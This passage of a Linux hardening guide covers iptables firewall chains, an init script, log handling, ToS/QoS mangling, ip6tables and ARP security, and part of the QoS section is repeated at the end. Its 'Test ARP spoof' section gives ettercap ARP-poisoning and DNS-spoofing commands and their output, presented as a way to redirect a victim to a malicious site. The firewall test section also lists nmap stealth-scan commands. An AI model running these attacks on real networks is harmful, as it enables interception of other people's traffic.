$IPTABLES -A SCANS -p udp --dport 28431 -j DROP

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A SCANS -j RETURN

#

#

fi

#

#

#*********************************************************

# Create a chain to filter packets that are not to be logged.

# Applied to INPUT on the external or Internet interface.

#

#

#------------------------------------------

# Drop SMB, CIFS, and related Windows traffic without logging.

# TODO: I think not all of these use TCP _and_ UDP. Tighten the rules!

#

if [ $BLOCK_SAMBA_WITHOUT_LOGGING -eq 1 ]

then

$IPTABLES -A NO_LOGGING -p tcp -m multiport --sports 135,137,138,139,445,1433,1434 -j DROP

$IPTABLES -A NO_LOGGING -p udp -m multiport --sports 135,137,138,139,445,1433,1434 -j DROP

#

$IPTABLES -A NO_LOGGING -p tcp -m multiport --dports 135,137,138,139,445,1433,1434 -j DROP

$IPTABLES -A NO_LOGGING -p udp -m multiport --dports 135,137,138,139,445,1433,1434 -j DROP

fi

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A NO_LOGGING -j RETURN

#

#

#*********************************************************

#

# INPUT CHAIN

#

# Add comments to your rules:

# -m comment --comment "Comments help to read output of iptables -nvL"

#

# Allow incoming for loopback interfaces

# Allow traffic on loopback interface (lo0)

#

$IPTABLES -A INPUT -i $LO_IFACE -j ACCEPT

#

#

# Reject all traffic to 127/8 that does not arrive on lo0.

# This should already be caught by the kernel's rp_filter, but it is

# cheap to enforce here as well. Note the negation syntax: the "!" goes

# before the option ("! -i"), not after it.

#

$IPTABLES -A INPUT ! -i $LO_IFACE -d 127.0.0.0/8 -j REJECT

#

#

# Drop invalid packets

#

$IPTABLES -A INPUT -j BAD_PACKETS

#

#

# Always allow certain packets

#

if [ $DO_WHITELISTING -eq 1 ]

then

$IPTABLES -A INPUT -j WHITELIST

fi

#

#

# Allow previously initiated connections to bypass rules

#

$IPTABLES -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

#$IPTABLES -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

#

#

# Drop packets from private address ranges coming in on the external

#

$IPTABLES -A INPUT -j PRIVATE_PACKETS

#

#

# Drop enemies

#

$IPTABLES -A INPUT -j BLACKLIST

#

#

# Allow packets not coming from the outside

#

#$IPTABLES -A INPUT -m conntrack --ctstate NEW -i $LOCAL_IFACE -j ACCEPT

#

#

# Route the rest to the appropriate user chain

#

$IPTABLES -A INPUT -p tcp -i $INET_IFACE -j TCP_IN

$IPTABLES -A INPUT -p udp -i $INET_IFACE -j UDP_IN

$IPTABLES -A INPUT -p icmp -i $INET_IFACE -j ICMP_IN

#

#

# Drop without logging broadcasts that get this far.

# Cuts down on log clutter.

# Comment this line if testing new rules that impact

# broadcast protocols.

#

$IPTABLES -A INPUT -m pkttype --pkt-type broadcast -j DROP

#

#

# Do not log certain packets, as they would generate too much logging

#

$IPTABLES -A INPUT -j NO_LOGGING

#

#

# Catch all

# Log packets that still don't match, and then DROP them.

#

$IPTABLES -A INPUT -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=INPUT:999 a=DROP "

$IPTABLES -A INPUT -j DROP

#

#

#*********************************************************

#

# OUTPUT CHAIN

#

#

# Allow outgoing for loopback interfaces

# Allow traffic on loopback interface (lo0)

#

$IPTABLES -A OUTPUT -o $LO_IFACE -j ACCEPT

#

#

# Reject all traffic to 127/8 that does not leave via lo0.

# This should already be caught by the kernel's rp_filter, but it is

# cheap to enforce here as well. Note the negation syntax: the "!" goes

# before the option ("! -o"), not after it.

#

$IPTABLES -A OUTPUT ! -o $LO_IFACE -d 127.0.0.0/8 -j REJECT

#

#

# Drop invalid packets

#

# Note: Be careful if you're using kernels older than 2.4.29. Some locally

# generated ICMP error types (going through OUTPUT) are erroneously tagged

# as INVALID (instead of RELATED).

# Details: http://lists.debian.org/debian-firewall/2006/05/msg00051.html.

#

$IPTABLES -A OUTPUT -j BAD_PACKETS

#

#

# Allow previously initiated connections to bypass rules

#

$IPTABLES -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

#

#

# Allow established connections, and those not coming from the outside

#

#$IPTABLES -A OUTPUT -m conntrack --ctstate NEW -i $LOCAL_IFACE -j ACCEPT

#

#

# Route the rest to the appropriate user chain

#

$IPTABLES -A OUTPUT -p tcp -o $INET_IFACE -j TCP_OUT

$IPTABLES -A OUTPUT -p udp -o $INET_IFACE -j UDP_OUT

$IPTABLES -A OUTPUT -p icmp -o $INET_IFACE -j ICMP_OUT

#

#

# Catch all

# Log packets that still don't match, and then DROP them.

#

$IPTABLES -A OUTPUT -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=OUTPUT:999 a=DROP "

$IPTABLES -A OUTPUT -j DROP

#

#

#*********************************************************

#

# FORWARD CHAIN

#

#

# Allows new forwarded packets

#

#$IPTABLES -A FORWARD -i $INET_IFACE -o $LOCAL_IFACE -s $LOCAL_NET -m conntrack --ctstate NEW -j ACCEPT

#

# Don't forward packets that arrive on the Internet interface back out of

# the same interface (hairpinning). New connections from the outside to

# the inside are not accepted by any rule below, so they end in the

# catch-all DROP unless whitelisted.

$IPTABLES -A FORWARD -i $INET_IFACE -o $INET_IFACE -j REJECT

#

#

# Drop invalid packets

#

$IPTABLES -A FORWARD -j BAD_PACKETS

#

#

# Always allow certain packets

#

if [ $DO_WHITELISTING -eq 1 ]

then

$IPTABLES -A FORWARD -j WHITELIST

fi

#

#

# Allow previously initiated connections to bypass rules

#

$IPTABLES -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

#

# Allow established connections, and those not coming from the outside

#$IPTABLES -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -i $LOCAL_IFACE -o $INET_IFACE -j ACCEPT

#

#

# Drop enemies

#

$IPTABLES -A FORWARD -j BLACKLIST

#

#

# Allow outgoing connections from the LAN side

# Route packets to either TCP or UDP as appropriate

#

$IPTABLES -A FORWARD -i $LOCAL_IFACE -o $INET_IFACE -p tcp -j TCP_OUT

$IPTABLES -A FORWARD -i $LOCAL_IFACE -o $INET_IFACE -p udp -j UDP_OUT

#

#

# Do not log certain packets, as they would generate too much logging

#

$IPTABLES -A FORWARD -j NO_LOGGING

#

#

# Catch all

# Log packets that still don't match, and then DROP them.

#

$IPTABLES -A FORWARD -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FORWARD:999 a=DROP "

$IPTABLES -A FORWARD -j DROP

#

#

#*********************************************************

#

# POSTROUTING CHAIN

#

#

#------------------------------------------

# Masquerade - Set up your gateway

#

if [ $DO_MASQUERADE -eq 1 ]

then

$IPTABLES -A POSTROUTING -t nat -o $INET_IFACE -j MASQUERADE

else

# POSTROUTING statements for 1:1 NAT

# (Connections originating from the home network servers)

#

# SNAT is used to NAT all other outbound connections initiated

# from the protected network to appear to come from the local

# IP address.

#

# MASQUERADE was chosen in the branch above because, with SNAT, the new

# source IP has to be specified explicitly, which only suits a static

# address.

#

# For routers with a static IP address SNAT is the best choice

# because it is faster than MASQUERADE which has to check the

# current IP address of the outgoing network interface at every

# packet. Since SNAT is only meaningful for packets leaving the

# router it is used within the POSTROUTING chain only.

#

#$IPTABLES -A POSTROUTING -t nat -o $INET_IFACE -j SNAT --to-source $INET_IP

# Outbound from the 1:1 mapped host: rewrite its private source address

# ($LOCAL_IP) to the public address ($INET_IP).

$IPTABLES -A POSTROUTING -t nat -s $LOCAL_IP -o $INET_IFACE -j SNAT --to-source $INET_IP

# POSTROUTING statements for Many:1 NAT

#$IPTABLES -A POSTROUTING -t nat -s $LOCAL_NET -o $INET_IFACE -j SNAT --to-source $INET_IP

fi

#

#

#*********************************************************

#

# PREROUTING CHAIN

#

#

if [ $DO_MASQUERADE -eq 0 ]

then

# PREROUTING statements for 1:1 NAT

# (Connections originating from the Internet)

#

# Inbound to the public address ($INET_IP): rewrite the destination to

# the mapped private host ($LOCAL_IP).

#$IPTABLES -A PREROUTING -t nat -i $INET_IFACE -j DNAT --to-destination $LOCAL_IP

$IPTABLES -A PREROUTING -t nat -d $INET_IP -i $INET_IFACE -j DNAT --to-destination $LOCAL_IP

fi

#

#

#------------------------------------------

# Blocks oversized unfragmented ICMP packets.

#

if [ $BLOCK_OVERSIZE_ICMP_PACKETS -eq 1 ]

then

$IPTABLES -A PREROUTING -t raw -p icmp -m length --length 1492:65535 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PRE:oversize_ICMP a=DROP "

$IPTABLES -A PREROUTING -t raw -p icmp -m length --length 1492:65535 -j DROP

fi

#

#

To allow updates to work, HTTP and DNS out should be allowed.

top

Make the firewall script executable

Issue the following command:

sudo chmod +x /sharewiz/firewall/firewall.sh

top

Create the firewall start / stop script

Issue the following command:

sudo vi /etc/init.d/firewall-sharewiz

…add the following content to the file:

#!/bin/bash

### BEGIN INIT INFO

# Provides:          firewall-sharewiz

# Required-Start:    $network

# Required-Stop:

# Default-Start:     2 3 4 5

# Default-Stop:      0 1 6

# Short-Description: Start and stop the ShareWiz iptables firewall.

### END INIT INFO

#

# Start and stop the Firewall.

# Modify the following settings as required:

IPTABLES=/sbin/iptables

FIREWALL_SCRIPT=/sharewiz/firewall/firewall.sh

#

# Flush every table the firewall script touches (filter, nat, mangle and

# raw), delete the user-defined chains and open all policies. Note that

# after "stop" the host is completely unfiltered until "start" is run again.

flush_rules() {

    for table in filter nat mangle raw

    do

        $IPTABLES -t $table --flush

        $IPTABLES -t $table --delete-chain

    done

    $IPTABLES -P INPUT ACCEPT

    $IPTABLES -P OUTPUT ACCEPT

    $IPTABLES -P FORWARD ACCEPT

    $IPTABLES -t nat -P PREROUTING ACCEPT

    $IPTABLES -t nat -P POSTROUTING ACCEPT

    $IPTABLES -t nat -P OUTPUT ACCEPT

}

case "$1" in

    start)

        $FIREWALL_SCRIPT

        ;;

    stop)

        flush_rules

        ;;

    restart)

        flush_rules

        $FIREWALL_SCRIPT

        ;;

    *)

        echo "Usage: $0 {start|stop|restart}" >&2

        exit 1

        ;;

esac

exit 0

top

Make the firewall script executable

Issue the following command:

sudo chmod +x /etc/init.d/firewall-sharewiz

top

Install the script to start and stop automatically on system boot and shutdown

Issue the following command:

sudo update-rc.d firewall-sharewiz defaults

To have the firewall start before the network comes up, use the following command instead:

sudo update-rc.d firewall-sharewiz start 20 2 3 4 5 . stop 99 0 1 6 .

top

Check if iptables is set to start during boot up

Issue the following command:

sudo chkconfig --list firewall-sharewiz

top

Check firewall status

Issue the following command:

sudo iptables -L INPUT -n

This should display:

Chain INPUT (policy ACCEPT)

target prot opt source destination

This output shows that there are no rules in the iptables INPUT chain.

top

Test firewall

Test using different testers:

sudo nmap -v -f 192.168.0.11

sudo nmap -v -sX 192.168.0.11

sudo nmap -v -sN 192.168.0.11

sudo hping3 -X 192.168.0.11

Test with the ShieldsUP! service at http://www.grc.com

top

Log firewall messages to a separate file

Issue the following command:

sudo vi /etc/rsyslog.d/50-default.conf

and comment out the following lines near the bottom of the file by placing a hash # mark in front:

daemon.*;mail.*;\

news.err;\

*.=debug;*.=info;\

*.=notice;*.=warn |/dev/xconsole

to

#daemon.*;mail.*;\

# news.err;\

# *.=debug;*.=info;\

# *.=notice;*.=warn |/dev/xconsole

There is a bug in the default installation, in that on a server no /dev/xconsole exists.

Therefore this entire section is commented out.

Issue the following command:

sudo vi /etc/rsyslog.d/20-iptables.conf

and add the following lines to the file:

# Log kernel generated iptables messages to their own file. Every LOG rule

# in the firewall script uses a prefix of the form "fp=<chain> a=<action> ",

# so match on that prefix (a filter on "iptables: " would match nothing).

:msg,contains,"fp=" /var/log/iptables.log

# Uncomment the following to stop logging anything that matches the last rule.

# Doing this will stop logging kernel generated iptables log messages to the file

# normally containing kern.* messages (eg, /var/log/kern.log).

# On rsyslog 7 and later, "& stop" is the preferred spelling of "& ~".

#& ~

This logs all firewall related messages to /var/log/iptables.log.

Prevent the logfile from getting too big.

Issue the following command:

sudo vi /etc/logrotate.d/iptables

and add the following lines to the file:

/var/log/iptables.log

{

    rotate 3

    daily

    missingok

    notifempty

    delaycompress

    compress

    postrotate

        /usr/sbin/service rsyslog restart > /dev/null

    endscript

}

A logrotate job is created to run daily to keep the log file from getting too large.

To view the firewall log file, issue the command:

sudo cat /var/log/iptables.log | grep DPT=22 | cut -d" " -f1-4,9,13,14,21,22,23,26
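The catch-all and SCANS rules above log with prefixes such as "fp=INPUT:999 a=DROP ", and the rsyslog rule routes those lines to /var/log/iptables.log. The following added example (not part of the ShareWiz scripts) summarises such lines by source, protocol and destination port and flags sources that were dropped on several distinct ports; the log lines embedded in it are constructed samples in the kernel LOG target's format.

```shell
#!/bin/sh
# Summarise the LOG-target lines written by the firewall script (every rule
# uses a "fp=<chain-or-signature> a=<action> " prefix). Added example, not part
# of the ShareWiz scripts; the sample lines below are constructed, not captured.

fw_summary() {
    # stdin: kernel log lines. stdout: "count src proto dport tag", busiest first.
    awk '
        /fp=/ {
            src = ""; dpt = "-"; proto = "-"; tag = "-"
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/)        src   = substr($i, 5)
                else if ($i ~ /^DPT=/)   dpt   = substr($i, 5)
                else if ($i ~ /^PROTO=/) proto = substr($i, 7)
                else if ($i ~ /^fp=/)    tag   = substr($i, 4)
            }
            if (src != "") count[src " " proto " " dpt " " tag]++
        }
        END { for (k in count) print count[k], k }
    ' | LC_ALL=C sort -k1,1nr -k2
}

fw_port_sweeps() {
    # Sources dropped on at least $1 (default 3) distinct destination ports:
    # a cheap port-sweep indicator. stdout: "distinct_ports src".
    awk -v thr="${1:-3}" '
        /fp=/ {
            src = ""; dpt = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/)      src = substr($i, 5)
                else if ($i ~ /^DPT=/) dpt = substr($i, 5)
            }
            if (src != "" && dpt != "" && !seen[src, dpt]++) ports[src]++
        }
        END { for (s in ports) if (ports[s] >= thr) print ports[s], s }
    ' | LC_ALL=C sort -k1,1nr -k2
}

# Constructed sample in the format the kernel LOG target produces. The last
# line is an ordinary kernel message and must be ignored by both functions.
SAMPLE_LOG=$(cat <<'EOF'
Mar  3 09:17:49 server1 kernel: [101.1] fp=INPUT:999 a=DROP IN=eth0 OUT= MAC=08:00:27:f2:4b:5d:00:22:3f:41:ff:b4:08:00 SRC=203.0.113.5 DST=192.168.0.11 LEN=60 TTL=54 PROTO=TCP SPT=51234 DPT=22 SYN URGP=0
Mar  3 09:17:52 server1 kernel: [104.2] fp=INPUT:999 a=DROP IN=eth0 OUT= MAC=08:00:27:f2:4b:5d:00:22:3f:41:ff:b4:08:00 SRC=203.0.113.5 DST=192.168.0.11 LEN=60 TTL=54 PROTO=TCP SPT=51235 DPT=22 SYN URGP=0
Mar  3 09:17:55 server1 kernel: [107.3] fp=INPUT:999 a=DROP IN=eth0 OUT= MAC=08:00:27:f2:4b:5d:00:22:3f:41:ff:b4:08:00 SRC=203.0.113.5 DST=192.168.0.11 LEN=60 TTL=54 PROTO=TCP SPT=51236 DPT=22 SYN URGP=0
Mar  3 09:18:01 server1 kernel: [113.4] fp=INPUT:999 a=DROP IN=eth0 OUT= MAC=08:00:27:f2:4b:5d:00:22:3f:41:ff:b4:08:00 SRC=198.51.100.7 DST=192.168.0.11 LEN=44 TTL=48 PROTO=TCP SPT=40001 DPT=23 SYN URGP=0
Mar  3 09:18:02 server1 kernel: [114.5] fp=Subseven:1 a=DROP IN=eth0 OUT= MAC=08:00:27:f2:4b:5d:00:22:3f:41:ff:b4:08:00 SRC=198.51.100.7 DST=192.168.0.11 LEN=44 TTL=48 PROTO=TCP SPT=40002 DPT=1243 SYN URGP=0
Mar  3 09:18:03 server1 kernel: [115.6] fp=Deepthroat a=DROP IN=eth0 OUT= MAC=08:00:27:f2:4b:5d:00:22:3f:41:ff:b4:08:00 SRC=198.51.100.7 DST=192.168.0.11 LEN=44 TTL=48 PROTO=TCP SPT=40003 DPT=6670 SYN URGP=0
Mar  3 09:18:04 server1 kernel: [116.7] fp=Back-Orifice a=DROP IN=eth0 OUT= MAC=08:00:27:f2:4b:5d:00:22:3f:41:ff:b4:08:00 SRC=198.51.100.7 DST=192.168.0.11 LEN=28 TTL=48 PROTO=UDP SPT=31337 DPT=31337 LEN=8
Mar  3 09:18:10 server1 kernel: [122.0] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex
EOF
)

# Stand-alone demonstration on the constructed sample. On the live server
# replace the printf with: sudo cat /var/log/iptables.log
printf '%s\n' "$SAMPLE_LOG" | fw_summary
printf '%s\n' "$SAMPLE_LOG" | fw_port_sweeps 3
```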

top

Restart rsyslog

Issue the following command:

sudo service rsyslog restart

top

Quality of Service

Introduction

It is possible to set the Type of Service (ToS) using iptables.

TOS can be used to control the bandwidth usage of the network, for example by:

  • Speeding up certain types of data
  • Slowing down certain types of data
  • Controlling the amount of bandwidth used by peer-to-peer networking
  • Preventing attachments sent across the network from consuming all the bandwidth

top

Type of Service (TOS) bits

The Type Of Service (TOS) bits are a set of four-bit flags in the IP header. When any one of these bit flags is set, routers may handle the datagram differently than datagrams with no TOS bits set. Each of the four bits has a different purpose and only one of the TOS bits may be set at any time, so combinations are not allowed. The bit flags are called Type of Service bits because they enable the application transmitting the data to tell the network the type of network service it requires.

The classes of network service available are:

  • Minimum delay
    • Used when the time it takes for a datagram to travel from the source host to destination host (latency) is most important. A network provider might, for example, use both optical fiber and satellite network connections. Data carried across satellite connections has farther to travel and their latency is generally therefore higher than for terrestrial-based network connections between the same endpoints. A network provider might choose to ensure that datagrams with this type of service set are not carried by satellite.
  • Maximum throughput
    • Used when the volume of data transmitted in any period of time is important. There are many types of network applications for which latency is not particularly important but the network throughput is; for example, bulk-file transfers. A network provider might choose to route datagrams with this type of service set via high-latency, high-bandwidth routes, such as satellite connections.
  • Maximum reliability
    • Used when it is important that you have some certainty that the data will arrive at the destination without retransmission being required. The IP protocol may be carried over any number of underlying transmission mediums. While SLIP and PPP are adequate datalink protocols, they are not as reliable as carrying IP over some other network, such as an X.25 network. A network provider might make an alternate network available, offering high reliability, to carry IP that would be used if this type of service is selected.
  • Minimum cost
    • Used when it is important to minimize the cost of data transmission. Leasing bandwidth on a satellite for a transpacific crossing is generally less costly than leasing space on a fiber-optical cable over the same distance, so network providers may choose to provide both and charge differently depending on which you use. In this scenario, your “minimum cost” type of service bit may cause your datagrams to be routed via the lower-cost satellite route.

A lot of routers on the Internet do not handle TOS settings very well, therefore it may prove to be a bit useless to attempt TOS mangling before sending the packets on to the Internet.

At best the routers will not pay any attention to the TOS field. At worst, they will look at the TOS field and do the wrong thing.

However, the TOS field can most definitely be put to good use if you have a large WAN or LAN with multiple routers. Packets can be given different routes and preferences, based on their TOS value - even though this might be confined to your own network.

top

Setting the TOS

TOS changes are specified using two bit masks. The first of these bit masks is logically ANDed with the TOS field in the IP header of the datagram and the second is logically XORed with it.

Example usage:

iptables -t mangle -A PREROUTING -p tcp --dport 22 -j TOS --set-tos 0x10

The --set-tos option tells the TOS mangler what TOS value to set on packets that are matched. The option takes a numeric value, either in hex or in decimal value.

The example states that SSH packets should ideally use Minimum Delay.

Suggested uses for the TOS bitmasks:

TOS                  AND mask   XOR mask   Suggested use
Minimum Delay        0x01       0x10       ftp, telnet, ssh
Maximum Throughput   0x01       0x08       ftp-data, www
Maximum Reliability  0x01       0x04       snmp, dns
Minimum Cost         0x01       0x02       nntp, smtp
Normal Service       0x01       0x00       other services

These predefined TOS values can be found in the kernel include files, more precisely in linux/ip.h.

For further information issue the following command:

sudo iptables -m tos -h

Good example:

The rules aim to carry out a crude method of traffic shaping, basically giving priority to traffic that needs a response immediately, allowing file sharing apps such as Azureus to continue in the background unnoticed.

# Assign priority to web, email, and ftp traffic.

iptables -A PREROUTING -t mangle -p tcp --sport http -j TOS --set-tos Minimize-Delay

iptables -A PREROUTING -t mangle -p tcp -m multiport --sports smtp,pop3 -j TOS --set-tos Minimize-Cost

iptables -A PREROUTING -t mangle -p tcp --sport ftp -j TOS --set-tos Minimize-Delay

iptables -A PREROUTING -t mangle -p tcp --sport ftp-data -j TOS --set-tos Maximize-Throughput

iptables -A OUTPUT -t mangle -p tcp --dport http -j TOS --set-tos Minimize-Delay

iptables -A OUTPUT -t mangle -p tcp -m multiport --dports smtp,pop3 -j TOS --set-tos Minimize-Cost

iptables -A OUTPUT -t mangle -p tcp --dport ftp -j TOS --set-tos Minimize-Delay

iptables -A OUTPUT -t mangle -p tcp --dport ftp-data -j TOS --set-tos Maximize-Throughput

top

Quality of Service

You can start marking packets by adding rules to the PREROUTING chain in the mangle table.

Issue the following command:

iptables -t mangle -A PREROUTING -p icmp -j MARK --set-mark 0x1

iptables -t mangle -A PREROUTING -p icmp -j RETURN

A -j RETURN is used so that packets do not traverse all the rules. ICMP packets won't match any other rules below the RETURN. Keep that in mind.

Now you should be able to see the packet count increasing when pinging from machines within the private network to some site on the Internet. Check that the packet count of class 1:10 increases with:

tc -s class show dev eth0

Now we can start adding more rules; let's do proper TOS handling:

iptables -t mangle -A PREROUTING -m tos --tos Minimize-Delay -j MARK --set-mark 0x1

iptables -t mangle -A PREROUTING -m tos --tos Minimize-Delay -j RETURN

iptables -t mangle -A PREROUTING -m tos --tos Minimize-Cost -j MARK --set-mark 0x5

iptables -t mangle -A PREROUTING -m tos --tos Minimize-Cost -j RETURN

iptables -t mangle -A PREROUTING -m tos --tos Maximize-Throughput -j MARK --set-mark 0x6

iptables -t mangle -A PREROUTING -m tos --tos Maximize-Throughput -j RETURN

Now prioritize ssh packets:

iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 0x1

iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN

A good idea is to prioritize packets to begin tcp connections, those with SYN flag set:

iptables -t mangle -I PREROUTING -p tcp -m tcp --tcp-flags SYN,RST,ACK SYN -j MARK --set-mark 0x1

iptables -t mangle -I PREROUTING -p tcp -m tcp --tcp-flags SYN,RST,ACK SYN -j RETURN

and so on.

When we are done adding rules to PREROUTING in mangle, we terminate the PREROUTING chain of the mangle table with:

iptables -t mangle -A PREROUTING -j MARK --set-mark 0x6

So previously unmarked traffic goes in 1:15.

This last step is unnecessary since default class was 1:15, but I will mark them in order to be consistent with the whole setup, and furthermore it's useful to see the counter in that rule.

It will be a good idea to do the same in the OUTPUT rule, so repeat those commands with -A OUTPUT instead of PREROUTING. ( s/PREROUTING/OUTPUT/ ). Then traffic generated locally (on the Linux router) will also be classified. I finish OUTPUT chain with -j MARK --set-mark 0x3 so local traffic has higher priority.

top

IP6 Firewall Security

Summary

To configure and manage IPv6 rulesets, you need to use ip6tables(8) which is provided by the default Debian install, in the package iptables.

http://manpages.debian.net/man/8/ip6tables

ip6tables -A INPUT -i lo -j ACCEPT

ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

ip6tables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

ip6tables -A INPUT -j REJECT

The four rules do the following:

  • Allow everything on the internal loopback interface.
  • Allow any packet that is an answer to a packet you sent out. This includes packets within a TCP connection and answers to UDP packets such as small DNS queries. For the old style unencrypted FTP protocol, this includes the data connection, assuming the ip_conntrack_ftp module is loaded.
  • Reject all attempts to open a TCP connection from the outside.
  • Reject all initial (non-answer) UDP packets.

Alternatively you can use -j DROP in the last two rules. For a discussion on this topic see Reject IP packets with an ICMP error, or just drop them?

top

ARP Firewall Security

Introduction

ARP (Address Resolution Protocol) is a lower-level protocol in the TCP/IP stack which is used to convert IP addresses to MAC (Media Access Control) addresses.

IP addresses are (in general) dynamic, but MAC addresses, being link-layer addresses, are almost static as they are allocated by the NIC (Network Interface Card) manufacturer.

Hence ARP is used to associate these IP addresses with the static hardware (MAC) addresses.

top

How ARP works

Whenever a router, switch or computer receives a data packet with a destination IP address, the device uses its ARP table to look up the corresponding MAC address.

If the packet's IP address does not have a corresponding MAC address in the ARP table, the device sends an ARP broadcast request on the local network to find out the MAC address for that IP address.

At this point, the computer which owns the IP address sends an appropriate response (an ARP reply) to the ARP broadcast request.

When the device that sent the ARP broadcast request receives the response, it stores that MAC-address-to-IP-address mapping in its cache memory.

If another packet for the same IP address arrives, it is sent to the cached MAC address without repeating the ARP request and ARP reply process.

top

How to hack ARP/Abuse ARP/Poison ARP

The critical point in this process is that there is no authentication mechanism to verify whether an ARP reply is coming from the computer that actually owns the IP address.

Using this loophole in the ARP mechanism, a device can easily be abused if an attacker sends it fake requests.

Another problem is that if a computer receives an ARP reply without having sent any broadcast request, it still caches this MAC-to-IP mapping for future use.

Hence ARP can be attacked or abused in two ways:

  • First method: the attacker listens for ARP broadcast requests and answers them with their own MAC address.

    This method is not very useful or efficient, because the attacker not only has to wait for the victim's ARP broadcast request but also has to send the reply before the true host replies.

  • Second method: the attacker sends an ARP reply to the target device, so the target device updates the IP-MAC table in its cache memory with the received MAC address.

    Hence this method is simpler and more effective than the first one.

top

Install arptables

Issue the following command:

sudo aptitude install arptables

Arptables is used to set up, maintain, and inspect the tables of ARP rules in the Linux kernel. It is analogous to iptables, but operates at the ARP layer rather than the IP layer.


top

Install other arp tools

Issue the following command:

sudo aptitude install arp-scan

sudo aptitude install dsniff

arp-scan is an ARP scanning and fingerprinting tool.

dsniff provides tools that can sniff network traffic for cleartext insecurities.

top

Display current ARP table

Issue the following command:

sudo arp -n

which should show something like:

Address HWtype HWaddress Flags Mask Iface

192.168.0.1 ether 00:22:3f:41:ff:b4 C eth0

192.168.0.10 ether 90:a4:de:ef:c0:70 C eth0

The entry shows that 192.168.0.1 on eth0 currently resolves to the MAC address "00:22:3f:41:ff:b4", i.e. the address of that host's NIC.

top

Check ARP table

Issue the following command:

sudo tcpdump host 192.168.0.1

which should show something like:

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

09:17:49.425917 ARP, Reply server1.sharewiz.local is-at 00:22:3f:41:ff:b4 (oui Unknown), length 46

09:17:50.307530 ARP, Request who-has server1.sharewiz.net tell server1.sharewiz.local, length 46

09:17:50.307572 ARP, Reply server1.sharewiz.net is-at 08:00:27:f2:4b:5d (oui Unknown), length 28

09:17:54.914215 ARP, Request who-has 192.168.0.10 tell server1.sharewiz.local, length 46

09:17:59.921273 ARP, Request who-has server1.sharewiz.local tell server1.sharewiz.net, length 28

09:17:59.931486 ARP, Reply server1.sharewiz.local is-at 00:22:3f:41:ff:b4 (oui Unknown), length 46

09:18:00.861271 ARP, Request who-has server1.sharewiz.local tell 192.168.0.10, length 46

Press CTRL+C to cancel the command.

While tcpdump was running, a ping was sent from the guest to the server.

As can be seen, the ping on the guest triggers an ARP request, and the server replies to the ARP request correctly.

top

Configure ARP

The arp protocol can be tuned by writing to a file(s) in the /proc filesystem.

/proc/sys/net//neigh//*

I think you can get what you want by increasing the gc_stale_time value.

Google for "gc_stale_time" for more info.

top

Clear ARP table

Issue the following command:

sudo ip neighbor flush all

Alternatively, issue the command sudo arp -d hostname repeatedly to accomplish this.

top

Test ARP spoof

Configure the DNS spoofing plugin to add a DNS record for our machine (whose IP address in this case is 192.168.0.11).

Issue the following command:

sudo vi /usr/share/ettercap/etter.dns

and add the following:

google.com A 192.168.0.11

*.google.com A 192.168.0.11

www.google.com PTR 192.168.0.11

and save the file.

Now we just fire up Ettercap and set it up to do an ARP poisoning attack with our plugin.

sudo ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.0.10/ /192.168.0.1/

which should show something like the following:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0.. (Ethenet)

eth0 -> 08:00:27:F2:4B:5D 192.168.0.11 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Privileges dropped to UID 65534 GID 65534...

etter.dns:47 Unknown record type PRT

28 plugins

39 protocol dissectors

53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services

Scanning for merged targets (2 hosts)...

* |====================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.0.10 08:00:27:F2:4B:5D

GROUP 2 : 192.168.0.1 08:00:27:14:28:CE

Starting Unified sniffing...

Text only Interface activated...

Hit 'h' for inline help

Activating dns_spoof plugin...

This attack will redirect the traffic of the victim to our malicious site.

To do this we’re going to use ARP poisoning with the ettercap DNS spoofing plugin.

Ettercap is used to redirect our traffic so that our victim THINKS they are visiting Google when in reality they are just getting shelled.

http://www.whenisfive.com/2011/11/25/silly-set-tricks-combining-set-and-ettercap-for-surprisingly-amusing-results/

top

Clear routing table

Issue the following command:

sudo route del ROUTEDESCRIPTOR

Issue the command repeatedly to accomplish this.

top

Change MAC address on an ethernet card

Issue the following command:

sudo ip link set dev ethN address 02:22:33:44:55:66

This will temporarily change the MAC address until either a reboot or the command is reissued. 02:22:33:44:55:66 is an example locally administered address; a MAC address has six octets, and some drivers require the interface to be down before the change is accepted. (ethtool's -s phyad option sets the PHY address, not the MAC address, so it cannot be used for this.)

Enter the command man ethtool and look at the -e and -E options, which read and change the card's firmware (EEPROM) setting.


Quality of Service

You can start marking packets by adding rules to the PREROUTING chain in the mangle table.

Issue the following command:

iptables -t mangle -A PREROUTING -p icmp -j MARK --set-mark 0x1

iptables -t mangle -A PREROUTING -p icmp -j RETURN

A -j RETURN is used so that marked packets do not traverse all the remaining rules: once an ICMP packet hits RETURN it leaves the chain, so it will not be matched by any rule placed below it. Keep that in mind when ordering the rules.

